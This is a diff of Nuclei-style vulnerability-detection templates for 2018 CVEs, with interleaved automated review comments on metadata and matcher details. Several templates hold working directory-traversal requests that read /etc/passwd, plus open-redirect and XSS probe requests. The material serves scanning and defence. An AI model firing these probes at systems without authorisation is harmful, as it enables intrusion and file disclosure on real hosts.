 - https://www.cvedetails.com/cve/CVE-2018-15535
- tags: cve,cve2018,lfi
+ - http://seclists.org/fulldisclosure/2018/Aug/34
+ - https://www.exploit-db.com/exploits/45271/
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
 cve-id: CVE-2018-15535
 cwe-id: CWE-22
+ tags: cve,cve2018,lfi
 requests:
 - method: GET
@@ -25,7 +27,7 @@ requests:
 - type: regex
 regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
 - type: status
 status:
diff --git a/cves/2018/CVE-2018-15745.yaml b/cves/2018/CVE-2018-15745.yaml
index 5b249a3069..d271e88968 100644
--- a/cves/2018/CVE-2018-15745.yaml
+++ b/cves/2018/CVE-2018-15745.yaml
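Review bot: The CVE-2018-15535 reference list now carries `https://www.exploit-db.com/exploits/45271` twice, once with and once without a trailing slash; drop the added one. The same pattern — a new entry that duplicates an existing one except for a trailing `/` or an `http://` scheme — recurs in CVE-2018-16059, -16288, -16299, -16668, -16670, -16671 and -16836 in this commit, which suggests the enrichment step merges NVD references without normalising URLs; fixing that at the source beats editing each template. Tightening the passwd regex to `root:.*:0:0:` is fine.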
@@ -5,13 +5,16 @@ info:
 author: gy741
 severity: high
 description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
- reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
- tags: cve,cve2018,argussurveillance,lfi
+ reference:
+ - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
+ - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html
+ - https://www.exploit-db.com/exploits/45296/
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
 cve-id: CVE-2018-15745
 cwe-id: CWE-22
+ tags: cve,cve2018,argussurveillance,lfi
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml
index fc6dc72993..8c9d54e30e 100644
--- a/cves/2018/CVE-2018-15961.yaml
+++ b/cves/2018/CVE-2018-15961.yaml
@@ -1,19 +1,23 @@
 id: CVE-2018-15961
 info:
- name: Adobe ColdFusion Unrestricted File Upload RCE
+ name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution
 author: SkyLark-Lab,ImNightmaree
 severity: critical
 description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2018-15961
 - https://github.com/xbufu/CVE-2018-15961
- tags: cve,cve2018,adobe,rce,coldfusion,fileupload
+ - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html
+ - http://www.securitytracker.com/id/1041621
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
 cve-id: CVE-2018-15961
 cwe-id: CWE-434
+ metadata:
+ shodan-query: http.component:"Adobe ColdFusion"
+ tags: cve,cve2018,adobe,rce,coldfusion,fileupload
 requests:
 - raw:
@@ -63,3 +67,5 @@ requests:
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml
index 2511f58f0e..e8d7c3e39e 100644
--- a/cves/2018/CVE-2018-16059.yaml
+++ b/cves/2018/CVE-2018-16059.yaml
@@ -4,16 +4,18 @@ info:
 name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
 author: daffainfo
 severity: medium
+ description: Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
 - https://www.exploit-db.com/exploits/45342
- tags: cve,cve2018,iot,lfi
+ - https://www.exploit-db.com/exploits/45342/
+ - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.30
+ cvss-score: 5.3
 cve-id: CVE-2018-16059
 cwe-id: CWE-22
- description: "Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter."
+ tags: cve,cve2018,iot,lfi
 requests:
 - method: POST
@@ -25,7 +27,7 @@ requests:
 matchers:
 - type: regex
 regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
 part: body
 - type: status
diff --git a/cves/2018/CVE-2018-16133.yaml b/cves/2018/CVE-2018-16133.yaml
index 6acefb5047..7e54e984da 100644
--- a/cves/2018/CVE-2018-16133.yaml
+++ b/cves/2018/CVE-2018-16133.yaml
@@ -1,4 +1,5 @@
 id: CVE-2018-16133
+
 info:
 name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal
 author: 0x_Akoko
@@ -8,6 +9,7 @@ info:
 - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
 - http://www.cybrotech.com/
 - https://www.cvedetails.com/cve/CVE-2018-16133
+ - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
 cvss-score: 5.3
diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml
index 905c2aa927..11a6ae97f3 100644
--- a/cves/2018/CVE-2018-16167.yaml
+++ b/cves/2018/CVE-2018-16167.yaml
@@ -1,19 +1,21 @@
 id: CVE-2018-16167
 info:
- name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
+ name: LogonTracer <=1.2.0 - Remote Command Injection
 author: gy741
 severity: critical
 description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
 reference:
 - https://www.exploit-db.com/exploits/49918
 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167
- tags: cve,cve2018,logontracer,rce,oast
+ - https://jvn.jp/en/vu/JVNVU98026636/index.html
+ - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
 cve-id: CVE-2018-16167
 cwe-id: CWE-78
+ tags: cve,cve2018,logontracer,rce,oast
 requests:
 - raw:
@@ -30,3 +32,5 @@ requests:
 part: interactsh_protocol # Confirms the HTTP Interaction
 words:
 - "http"
+
+# Enhanced by mp on 2022/05/12
diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml
index 5da2280652..4c485ff4b7 100644
--- a/cves/2018/CVE-2018-16283.yaml
+++ b/cves/2018/CVE-2018-16283.yaml
@@ -4,16 +4,18 @@ info:
 name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
 author: 0x240x23elu
 severity: critical
+ description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.
 reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
 - https://www.exploit-db.com/exploits/45438
- tags: cve,cve2018,wordpress,wp-plugin,lfi
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
+ - https://github.com/springjk/wordpress-wechat-broadcast/issues/14
+ - http://seclists.org/fulldisclosure/2018/Sep/32
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
 cve-id: CVE-2018-16283
 cwe-id: CWE-22
- description: "The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter."
+ tags: cve,cve2018,wordpress,wp-plugin,lfi
 requests:
 - method: GET
@@ -25,3 +27,5 @@ requests:
 regex:
 - "root:.*:0:0:"
 part: body
+
+# Enhanced by mp on 2022/04/26
diff --git a/cves/2018/CVE-2018-16288.yaml b/cves/2018/CVE-2018-16288.yaml
index d74869f104..e90a28a2aa 100644
--- a/cves/2018/CVE-2018-16288.yaml
+++ b/cves/2018/CVE-2018-16288.yaml
@@ -8,12 +8,14 @@ info:
 reference:
 - https://www.exploit-db.com/exploits/45440
 - https://www.cvedetails.com/cve/CVE-2018-16288
- tags: cve,cve2018,lfi
+ - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
+ - https://www.exploit-db.com/exploits/45440/
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- cvss-score: 8.60
+ cvss-score: 8.6
 cve-id: CVE-2018-16288
 cwe-id: CWE-200
+ tags: cve,cve2018,lfi
 requests:
 - method: GET
@@ -25,7 +27,7 @@ requests:
 - type: regex
 regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
 - type: status
 status:
diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml
index 08a387bb74..1f6e3c1e20 100644
--- a/cves/2018/CVE-2018-16299.yaml
+++ b/cves/2018/CVE-2018-16299.yaml
@@ -5,13 +5,17 @@ info:
 author: 0x_Akoko,0x240x23elu
 severity: high
 description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
- reference: https://www.exploit-db.com/exploits/45439
- tags: wordpress,cve2018,cve,lfi
+ reference:
+ - https://www.exploit-db.com/exploits/45439
+ - https://www.exploit-db.com/exploits/45439/
+ - https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html
+ - https://github.com/julianburr/wp-plugin-localizemypost/issues/1
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
 cve-id: CVE-2018-16299
 cwe-id: CWE-22
+ tags: wordpress,cve2018,cve,lfi,plugin
 requests:
 - method: GET
@@ -23,7 +27,7 @@ requests:
 - type: regex
 regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
 - type: status
 status:
diff --git a/cves/2018/CVE-2018-16341.yaml b/cves/2018/CVE-2018-16341.yaml
index ebc296d3da..03c9ed3efd 100644
--- a/cves/2018/CVE-2018-16341.yaml
+++ b/cves/2018/CVE-2018-16341.yaml
@@ -5,7 +5,9 @@ info:
 author: madrobot
 severity: high
 description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
- tags: cve,cve2018,nuxeo,ssti,rce
+ classification:
+ cve-id: CVE-2018-16341
+ tags: cve,cve2018,nuxeo,ssti,rce,bypass
 requests:
 - method: GET
@@ -15,4 +17,4 @@ requests:
 - type: word
 words:
 - "31333333337"
- part: body
\ No newline at end of file
+ part: body
diff --git a/cves/2018/CVE-2018-16668.yaml b/cves/2018/CVE-2018-16668.yaml
index 76cc91f0bd..a4af5ea5ac 100644
--- a/cves/2018/CVE-2018-16668.yaml
+++ b/cves/2018/CVE-2018-16668.yaml
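Review bot: The `classification` block added to CVE-2018-16341 carries only `cve-id`, and nothing between `author` and `tags` is a `reference:` entry (lines 1–4, presumably `id`/`info:`/`name`, are outside the hunk), whereas every other template touched in this commit gained an NVD link plus `cvss-metrics`/`cvss-score`/`cwe-id`. At minimum add `reference:` with `- https://nvd.nist.gov/vuln/detail/CVE-2018-16341` and the NVD vector, and expand the one-line description (`Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI`) into a sentence that names the affected versions and the injection point. The trailing-newline fix in the second hunk is fine.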
@@ -2,17 +2,19 @@ id: CVE-2018-16668
 info:
 name: CirCarLife SCADA Installation Paths
+ author: geeknik
+ severity: medium
 description: System software installation path disclosure due to lack of authentication
 reference:
 - https://www.exploit-db.com/exploits/45384
- author: geeknik
- severity: medium
- tags: cve,cve2018,circarlife,scada,iot,disclosure
+ - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
+ - https://www.exploit-db.com/exploits/45384/
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.30
+ cvss-score: 5.3
 cve-id: CVE-2018-16668
 cwe-id: CWE-287
+ tags: cve,cve2018,circarlife,scada,iot,disclosure
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-16670.yaml b/cves/2018/CVE-2018-16670.yaml
index b253aecfda..bf69edf1c7 100644
--- a/cves/2018/CVE-2018-16670.yaml
+++ b/cves/2018/CVE-2018-16670.yaml
@@ -2,17 +2,19 @@ id: CVE-2018-16670
 info:
 name: CirCarLife SCADA PLC Status
+ author: geeknik
+ severity: medium
 description: PLC status disclosure due to lack of authentication
 reference:
 - https://www.exploit-db.com/exploits/45384
- author: geeknik
- severity: medium
- tags: cve,cve2018,circarlife,scada,plc,iot,disclosure
+ - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
+ - https://www.exploit-db.com/exploits/45384/
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.30
+ cvss-score: 5.3
 cve-id: CVE-2018-16670
 cwe-id: CWE-287
+ tags: cve,cve2018,circarlife,scada,plc,iot,disclosure
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-16671.yaml b/cves/2018/CVE-2018-16671.yaml
index 2457153b08..9a3d84bf1d 100644
--- a/cves/2018/CVE-2018-16671.yaml
+++ b/cves/2018/CVE-2018-16671.yaml
@@ -2,17 +2,19 @@ id: CVE-2018-16671
 info:
 name: CirCarLife SCADA Device ID
+ author: geeknik
+ severity: medium
 description: System software information disclosure due to lack of authentication
 reference:
 - https://www.exploit-db.com/exploits/45384
- author: geeknik
- severity: medium
- tags: cve,cve2018,circarlife,scada,iot,disclosure
+ - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
+ - https://www.exploit-db.com/exploits/45384/
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.30
+ cvss-score: 5.3
 cve-id: CVE-2018-16671
 cwe-id: CWE-200
+ tags: cve,cve2018,circarlife,scada,iot,disclosure
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-16716.yaml b/cves/2018/CVE-2018-16716.yaml
new file mode 100644
index 0000000000..b74af567f1
--- /dev/null
+++ b/cves/2018/CVE-2018-16716.yaml
@@ -0,0 +1,33 @@
+id: CVE-2018-16716
+
+info:
+ name: NCBI ToolBox - Directory Traversal
+ author: 0x_Akoko
+ severity: critical
+ description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
+ reference:
+ - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 9.1
+ cve-id: CVE-2018-16716
+ cwe-id: CWE-22
+ tags: cve,cve2018,ncbi,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml
index bcdb226a69..773df02e1e 100644
--- a/cves/2018/CVE-2018-16763.yaml
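Review bot: The traversal in `/blast/nph-viewgif.cgi?../../../../etc/passwd` climbs exactly four levels, which matches the PoC but silently assumes the CGI sits four directories below `/`; extra `../` segments past the root are harmless on Linux, so a longer sequence (the other new templates in this commit use seven to ten) costs nothing and avoids missing installs under a deeper prefix. As with the other new templates here, `root:.*:0:0:` would be preferable to `root:[x*]:0:0` so an empty password field still matches. The `C:H/I:H/A:N` vector and `critical` severity presumably include the file-deletion side the description mentions, while the request only exercises the read — worth a clause in the description so the severity is not read as the template's own claim.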
+++ b/cves/2018/CVE-2018-16763.yaml
@@ -1,20 +1,21 @@
 id: CVE-2018-16763
 info:
- name: fuelCMS 1.4.1 - Remote Code Execution
+ name: FUEL CMS 1.4.1 - Remote Code Execution
 author: pikpikcu
 severity: critical
- tags: cve,cve2018,fuelcms,rce
+ description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
 reference:
 - https://www.exploit-db.com/exploits/47138
- - https://www.getfuelcms.com/ # Vendor Homepage
- - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Software Link
+ - https://www.getfuelcms.com/
+ - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16763
 classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
 cve-id: CVE-2018-16763
 cwe-id: CWE-74
- description: "FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution."
+ tags: cve,cve2018,fuelcms,rce
 requests:
 - raw:
@@ -30,3 +31,5 @@ requests:
 - type: regex
 regex:
 - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/05/12
diff --git a/cves/2018/CVE-2018-16836.yaml b/cves/2018/CVE-2018-16836.yaml
index 0a8102bf1d..87db214d73 100644
--- a/cves/2018/CVE-2018-16836.yaml
+++ b/cves/2018/CVE-2018-16836.yaml
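Review bot: The rewritten description drops the sentence `This can lead to Pre-Auth Remote Code Execution.` that the removed quoted description carried; "unauthenticated" is the single most useful qualifier on a critical RCE template and is what the raw request below (outside the hunk) demonstrates, so keep it: `description: FUEL CMS 1.4.1 allows PHP code evaluation via the pages/select/ filter parameter or the preview/ data parameter, leading to unauthenticated remote code execution.` The rest of the hunk (vector moved to CVSS:3.1, NVD link added, inline `# Vendor Homepage` comments removed) is fine.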
@@ -1,17 +1,21 @@
 id: CVE-2018-16836
 info:
- name: Rubedo CMS 3.4.0 - Directory Traversal
+ name: Rubedo CMS <=3.4.0 - Directory Traversal
 author: 0x_Akoko
 severity: critical
- reference: https://www.exploit-db.com/exploits/45385
- tags: cve,cve2018,rubedo,lfi
+ description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.
+ reference:
+ - https://www.exploit-db.com/exploits/45385
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16836
+ - https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms
+ - https://www.exploit-db.com/exploits/45385/
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
 cve-id: CVE-2018-16836
 cwe-id: CWE-22
- description: "Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI."
+ tags: cve,cve2018,rubedo,lfi
 requests:
 - method: GET
@@ -22,8 +26,10 @@ requests:
 matchers:
 - type: regex
 regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/05/13
diff --git a/cves/2018/CVE-2018-17246.yaml b/cves/2018/CVE-2018-17246.yaml
index c4f12c3f51..e4a5e3b909 100644
--- a/cves/2018/CVE-2018-17246.yaml
+++ b/cves/2018/CVE-2018-17246.yaml
@@ -1,18 +1,21 @@ id: CVE-2018-17246 + info: - name: Kibana Local File Inclusion + name: Kibana - Local File Inclusion author: princechaddha severity: critical - description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md - tags: cve,cve2018,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 + - https://www.elastic.co/community/security + - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-17246 cwe-id: CWE-829 + tags: cve,cve2018,lfi,kibana requests: - method: GET @@ -36,3 +39,5 @@ requests: - type: status status: - 500 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 4cfc98d6bf..348c3260bf 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml 
@@ -1,19 +1,20 @@ id: CVE-2018-17254 info: - name: Joomla JCK Editor SQL Injection + name: Joomla! JCK Editor SQL Injection author: Suman_Kar - description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. severity: critical - tags: joomla,sqli,cve,cve2018 + description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 + remediation: Update or remove the affected plugin. + tags: joomla,sqli,cve,cve2018 requests: - raw: @@ -27,3 +28,5 @@ requests: part: body words: - "nuclei-template" + +# Enhanced by mp on 2022/02/08 diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml new file mode 100644 index 0000000000..e9c70f056b --- /dev/null +++ b/cves/2018/CVE-2018-17422.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2018-17422 + +info: + name: dotCMS < 5.0.2 - Open Redirect + author: 0x_Akoko,daffainfo + severity: medium + description: | + dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. + reference: + - https://github.com/dotCMS/core/issues/15286 + - https://www.cvedetails.com/cve/CVE-2018-17422 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-17422 + cwe-id: CWE-601 + metadata: + shodan-query: http.title:"dotCMS" + verified: "true" + tags: cve,cve2018,redirect,dotcms + +requests: + - method: GET + path: + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com' + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "self.location = 'http://www.example.com'" + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index ab6e84abda..d8175df08e 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml 
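Review bot: `verified: "true"` is a quoted string here and in the new CVE-2018-18608 template, while the new CVE-2018-19326 template writes `verified: true` as a boolean; the three files added in this commit should agree on one form, whichever the template validator expects. Separately, the only content matcher, `self.location = 'http://www.example.com'`, is tied to the `forward_js.jsp` FORWARD_URL request; unless `page_preview_popup.jsp` renders the same string, the second path only adds a request that cannot match, so either confirm that or document why it is kept. A one-line comment above the second path stating which matcher is expected to cover it would make the intent reviewable.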
@@ -1,19 +1,21 @@ id: CVE-2018-17431 info: - name: Comodo Unified Threat Management Web Console 2.7.0 - RCE + name: Comodo Unified Threat Management Web Console - Remote Code Execution author: dwisiswant0 severity: critical - description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based) - tags: cve,cve2018,comodo,rce + description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 + - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 + tags: cve,cve2018,comodo,rce requests: - raw: @@ -35,4 +37,6 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-18069.yaml b/cves/2018/CVE-2018-18069.yaml index eab47b98dc..1a56c2d92d 100644 --- a/cves/2018/CVE-2018-18069.yaml +++ b/cves/2018/CVE-2018-18069.yaml 
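Review bot: The renamed title drops the version bound that the other renames in this commit keep in the name (`Rubedo CMS <=3.4.0`, `dotCMS < 5.0.2`, `WordPress Payeezy Pay <=2.97`); since the description still says `before 2.7.0 & 1.5.0`, `name: Comodo Unified Threat Management Web Console < 2.7.0 - Remote Code Execution` would keep name and description consistent. The request block is unchanged and lies outside this hunk.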
@@ -1,27 +1,37 @@ id: CVE-2018-18069 info: - name: Wordpress unauthenticated stored xss + name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting author: nadino severity: medium - description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. - tags: cve,cve2018,wordpress,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-18069 - cwe-id: CWE-79 + description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php + request to wp-admin/admin.php. reference: - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-18069 + cwe-id: CWE-79 + tags: cve,cve2018,wordpress,xss,plugin requests: - method: POST path: - "{{BaseURL}}/wp-admin/admin.php" - body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN">' - redirects: true + body: | + icl_post_action=save_theme_localization&locale_file_name_en=EN"> + + redirects: true + max-redirects: 2 matchers: - type: dsl dsl: - - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")' + - 'contains(tolower(all_headers), "text/html")' + - 'contains(set_cookie, "_icl_current_admin_language")' + - 'contains(body, "\">")' + condition: and + +# Enhanced by mp on 2022/04/08 diff --git a/cves/2018/CVE-2018-18264.yaml b/cves/2018/CVE-2018-18264.yaml new file mode 100644 index 0000000000..7d14a28bf0 --- /dev/null 
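Review bot: Switching `body` to a `|` block scalar changes the request body: `|` keeps the trailing newline, so the POST body now ends with `\n` where the previous single-quoted value did not, and that newline becomes part of the `locale_file_name_en` value. If the change was only meant to avoid quoting, `body: |-` preserves the original bytes. The `description` is also written as a multi-line plain scalar (the line `request to wp-admin/admin.php.` continues the previous one by indentation alone), which parses but folds silently and breaks if the indent is ever touched; the CVE-2018-2791 hunk has the same pattern across four lines, and `description: >-` (as CVE-2018-2628 in this commit does with `|`) makes the intent explicit. The split of the dsl matcher into three entries with `condition: and` is equivalent to the removed combined expression.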
